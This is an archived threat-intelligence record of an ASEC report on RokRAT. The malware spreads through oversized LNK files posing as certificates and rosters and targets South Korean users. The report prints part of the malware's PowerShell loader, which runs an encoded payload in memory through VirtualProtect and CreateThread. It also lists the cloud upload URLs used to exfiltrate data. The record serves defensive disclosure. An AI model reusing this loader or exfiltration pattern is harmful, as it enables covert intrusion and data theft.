{
	"id": "7ea3c216-00d8-4eb2-8776-09fd81ca4827",
	"created_at": "2026-04-06T00:22:19.079616Z",
	"updated_at": "2026-04-10T03:38:06.607027Z",
	"deleted_at": null,
	"sha1_hash": "05577b80c2a6a8dc731116ca46f868db35bc8ba9",
	"title": "LNK File Disguised as Certificate Distributing RokRAT Malware - ASEC",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 1659928,
	"plain_text": "LNK File Disguised as Certificate Distributing RokRAT Malware -\r\nASEC\r\nBy ATCP\r\nPublished: 2024-04-22 · Archived: 2026-04-05 18:09:09 UTC\r\nAhnLab SEcurity intelligence Center (ASEC) has confirmed the continuous distribution of shortcut files (*.LNK) of abnormal sizes that disseminate backdoor-type malware. The recently confirmed shortcut files (*.LNK) are found to be targeting South Korean users, particularly those related to North Korea. The confirmed LNK file names are as follows:\r\nNational Information Academy 8th Integrated Course Certificate (Final).lnk\r\nGate access roster 2024.lnk\r\nNortheast Project (US Congressional Research Service (CRS Report).lnk\r\nFacility list.lnk\r\nhttps://asec.ahnlab.com/en/65076/\r\nPage 1 of 7\n\nThe confirmed LNK files contain a command to execute PowerShell via CMD, and their type is similar to the type found in “RokRAT Malware Distributed Through LNK Files (*.lnk): RedEyes (ScarCruft)” [1] posted last year. A notable fact about this type is that it includes legitimate document files, script code, and malicious PE data inside the LNK files.\r\n\r\nThe simplified operation process of the malware is as shown below.\r\nWhen the LNK file is executed, it runs PowerShell commands to create and execute a legitimate document file.\r\n\r\nAfterward, it creates three files in the %public% folder. The names and features of the files created in this step are as follows.\r\nFile name | Location in LNK file | Feature\r\nviewer.dat | 0x2BC97 (size: 0xD9402) | Encoded RokRAT malware\r\nsearch.dat | 0x105099 (size: 0x5AA) | Executes viewer.dat file\r\nfind.bat | 0x105643 (size: 0x139) | Executes search.dat file\r\nTable 1. List of created files\r\nThe first executed item is “find.bat”, which runs “search.dat” via PowerShell. 
“search.dat” reads the “viewer.dat” file and executes it in a fileless manner.\r\n$exePath=$env:public+'\\'+'viewer.dat';\r\n$exeFile = Get-Content -path $exePath -encoding byte;\r\n[Net.ServicePointManager]::SecurityProtocol = [Enum]::ToObject([Net.SecurityProtocolType], 3072);\r\n$k1123 = [System.Text.Encoding]::UTF8.GetString(34) + 'kernel32.dll' + [System.Text.Encoding]::UTF8.GetString(34\r\n\u003comitted\u003e\r\n$byteCount = $exeFile.Length;\r\n$buffer = $b::GlobalAlloc(0x0040, $byteCount + 0x100);\r\n$old = 0;\r\n$a90234sb::VirtualProtect($buffer, $byteCount + 0x100, 0x40, [ref]$old);\r\nfor($i = 0;$i -lt $byteCount;$i++) {\r\n[System.Runtime.InteropServices.Marshal]::WriteByte($buffer, $i, $exeFile[$i]); };\r\n$handle = $cake3sd23::CreateThread(0, 0, $buffer, 0, 0, 0);\r\n$fried3sd23::WaitForSingleObject($handle, 500 * 1000);\r\nThe data of “viewer.dat” that is ultimately executed is the RokRAT malware, which is a backdoor-type malware capable of utilizing cloud APIs to collect user information and perform various malicious behaviors at the threat actor’s command.\r\nThe collected information is transmitted to the threat actor’s cloud server using cloud services such as pCloud, Yandex, and DropBox. 
At this point, the UserAgent in the request header is disguised as Googlebot, and the cloud URLs used are listed in the table below.\r\nUser-Agent: Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)\r\nCloud | URL\r\nPcloud (Down) | https://api.pcloud.com/getfilelink?path=%s\u0026forcedownload=1\u0026skipfilename=1\r\nPcloud (Up) | https://api.pcloud.com/uploadfile?path=%s\u0026filename=%s\u0026nopartial=1\r\nYandex (Down) | https://cloud-api.yandex.net/v1/disk/resources/download?path=%s\r\nYandex (Up) | https://cloud-api.yandex.net/v1/disk/resources/upload?path=%s\u0026overwrite=%s\r\nDropBox (Down) | https://content.dropboxapi.com/2/files/download\r\nDropBox (Up) | https://content.dropboxapi.com/2/files/upload\r\nTable 2. Details on the cloud URLs used\r\nThe malicious behaviors that can be executed according to the threat actor’s command include:\r\nExecution of cmd commands\r\nCollection of directory listings\r\nDeletion of specific files (with VBS, CMD, BAT, and LNK extensions) within the Startup folder\r\nCollection of Startup folder listings, %APPDATA% folder listings, and recently used file listings\r\nCollection of PC information (system information, IP, router information, etc.)\r\nAdditionally, various other malicious behaviors can be performed, and the collected information is stored in the %TEMP% folder before being uploaded to the threat actor’s cloud server. The email addresses of the threat actor identified during the analysis process are as follows.\r\ntanessha.samuel@gmail[.]com\r\ntianling0315@gmail[.]com\r\nw.sarah0808@gmail[.]com\r\nsoftpower21cs@gmail[.]com\r\nThrough its blog, ASEC has been consistently sharing information about the distribution of malicious shortcut files due to the frequent occurrence of such incidents. 
In particular, malware aimed at individuals associated with Korean unification, military, and education has been identified continuously over the years, highlighting the need for extra caution.\r\n[File Detection]\r\nDropper/LNK.S2343 (2024.04.12.03)\r\nTrojan/BAT.Runner (2024.04.12.00)\r\nTrojan/Script.Generic (2024.04.12.00)\r\nData/BIN.EncPe (2024.04.12.00)\r\nInfostealer/Win.Agent.R579429 (2023.05.05.01)\r\nMD5\r\n3114a3d092e269128f72cfd34812ddc8\r\n35441efd293d9c9fb4788a3f0b4f2e6b\r\n358122718ba11b3e8bb56340dbe94f51\r\n68386fa9933b2dc5711dffcee0748115\r\n6e5e5ec38454ecf94e723897a42450ea\r\nAdditional IOCs are available on AhnLab TIP.\r\nGain access to related IOCs and detailed analysis by subscribing to AhnLab TIP. For subscription details, click the banner below.\r\nSource: https://asec.ahnlab.com/en/65076/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://asec.ahnlab.com/en/65076/"
	],
	"report_names": [
		"65076"
	],
	"threat_actors": [
		{
			"id": "6f30fd35-b1c9-43c4-9137-2f61cd5f031e",
			"created_at": "2025-08-07T02:03:25.082908Z",
			"updated_at": "2026-04-10T02:00:03.744649Z",
			"deleted_at": null,
			"main_name": "NICKEL FOXCROFT",
			"aliases": [
				"APT37 ",
				"ATK4 ",
				"Group 123 ",
				"InkySquid ",
				"Moldy Pisces ",
				"Operation Daybreak ",
				"Operaton Erebus ",
				"RICOCHET CHOLLIMA ",
				"Reaper ",
				"ScarCruft ",
				"TA-RedAnt ",
				"Venus 121 "
			],
			"source_name": "Secureworks:NICKEL FOXCROFT",
			"tools": [
				"Bluelight",
				"Chinotto",
				"GOLDBACKDOOR",
				"KevDroid",
				"KoSpy",
				"PoorWeb",
				"ROKRAT",
				"final1stpy"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "bbe36874-34b7-4bfb-b38b-84a00b07042e",
			"created_at": "2022-10-25T15:50:23.375277Z",
			"updated_at": "2026-04-10T02:00:05.327922Z",
			"deleted_at": null,
			"main_name": "APT37",
			"aliases": [
				"APT37",
				"InkySquid",
				"ScarCruft",
				"Group123",
				"TEMP.Reaper",
				"Ricochet Chollima"
			],
			"source_name": "MITRE:APT37",
			"tools": [
				"BLUELIGHT",
				"CORALDECK",
				"KARAE",
				"SLOWDRIFT",
				"ROKRAT",
				"SHUTTERSPEED",
				"POORAIM",
				"HAPPYWORK",
				"Final1stspy",
				"Cobalt Strike",
				"NavRAT",
				"DOGCALL",
				"WINERACK"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "552ff939-52c3-421b-b6c9-749cbc21a794",
			"created_at": "2023-01-06T13:46:38.742547Z",
			"updated_at": "2026-04-10T02:00:03.08515Z",
			"deleted_at": null,
			"main_name": "APT37",
			"aliases": [
				"Operation Daybreak",
				"Red Eyes",
				"ScarCruft",
				"G0067",
				"Group123",
				"Reaper Group",
				"Ricochet Chollima",
				"ATK4",
				"APT 37",
				"Operation Erebus",
				"Moldy Pisces",
				"APT-C-28",
				"Group 123",
				"InkySquid",
				"Venus 121"
			],
			"source_name": "MISPGALAXY:APT37",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "9b02c527-5077-489e-9a80-5d88947fddab",
			"created_at": "2022-10-25T16:07:24.103499Z",
			"updated_at": "2026-04-10T02:00:04.867181Z",
			"deleted_at": null,
			"main_name": "Reaper",
			"aliases": [
				"APT 37",
				"ATK 4",
				"Cerium",
				"Crooked Pisces",
				"G0067",
				"Geumseong121",
				"Group 123",
				"ITG10",
				"InkySquid",
				"Moldy Pisces",
				"Opal Sleet",
				"Operation Are You Happy?",
				"Operation Battle Cruiser",
				"Operation Black Banner",
				"Operation Daybreak",
				"Operation Dragon messenger",
				"Operation Erebus",
				"Operation Evil New Year",
				"Operation Evil New Year 2018",
				"Operation Fractured Block",
				"Operation Fractured Statue",
				"Operation FreeMilk",
				"Operation Golden Bird",
				"Operation Golden Time",
				"Operation High Expert",
				"Operation Holiday Wiper",
				"Operation Korean Sword",
				"Operation North Korean Human Right",
				"Operation Onezero",
				"Operation Rocket Man",
				"Operation SHROUDED#SLEEP",
				"Operation STARK#MULE",
				"Operation STIFF#BIZON",
				"Operation Spy Cloud",
				"Operation Star Cruiser",
				"Operation ToyBox Story",
				"Osmium",
				"Red Eyes",
				"Ricochet Chollima",
				"Ruby Sleet",
				"ScarCruft",
				"TA-RedAnt",
				"TEMP.Reaper",
				"Venus 121"
			],
			"source_name": "ETDA:Reaper",
			"tools": [
				"Agentemis",
				"BLUELIGHT",
				"Backdoor.APT.POORAIM",
				"CARROTBALL",
				"CARROTBAT",
				"CORALDECK",
				"Cobalt Strike",
				"CobaltStrike",
				"DOGCALL",
				"Erebus",
				"Exploit.APT.RICECURRY",
				"Final1stSpy",
				"Freenki Loader",
				"GELCAPSULE",
				"GOLDBACKDOOR",
				"GreezeBackdoor",
				"HAPPYWORK",
				"JinhoSpy",
				"KARAE",
				"KevDroid",
				"Konni",
				"MILKDROP",
				"N1stAgent",
				"NavRAT",
				"Nokki",
				"Oceansalt",
				"POORAIM",
				"PoohMilk",
				"PoohMilk Loader",
				"RICECURRY",
				"RUHAPPY",
				"RokRAT",
				"SHUTTERSPEED",
				"SLOWDRIFT",
				"SOUNDWAVE",
				"SYSCON",
				"Sanny",
				"ScarCruft",
				"StarCruft",
				"Syscon",
				"VeilShell",
				"WINERACK",
				"ZUMKONG",
				"cobeacon"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434939,
	"ts_updated_at": 1775792286,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/05577b80c2a6a8dc731116ca46f868db35bc8ba9.pdf",
		"text": "https://archive.orkl.eu/05577b80c2a6a8dc731116ca46f868db35bc8ba9.txt",
		"img": "https://archive.orkl.eu/05577b80c2a6a8dc731116ca46f868db35bc8ba9.jpg"
	}
}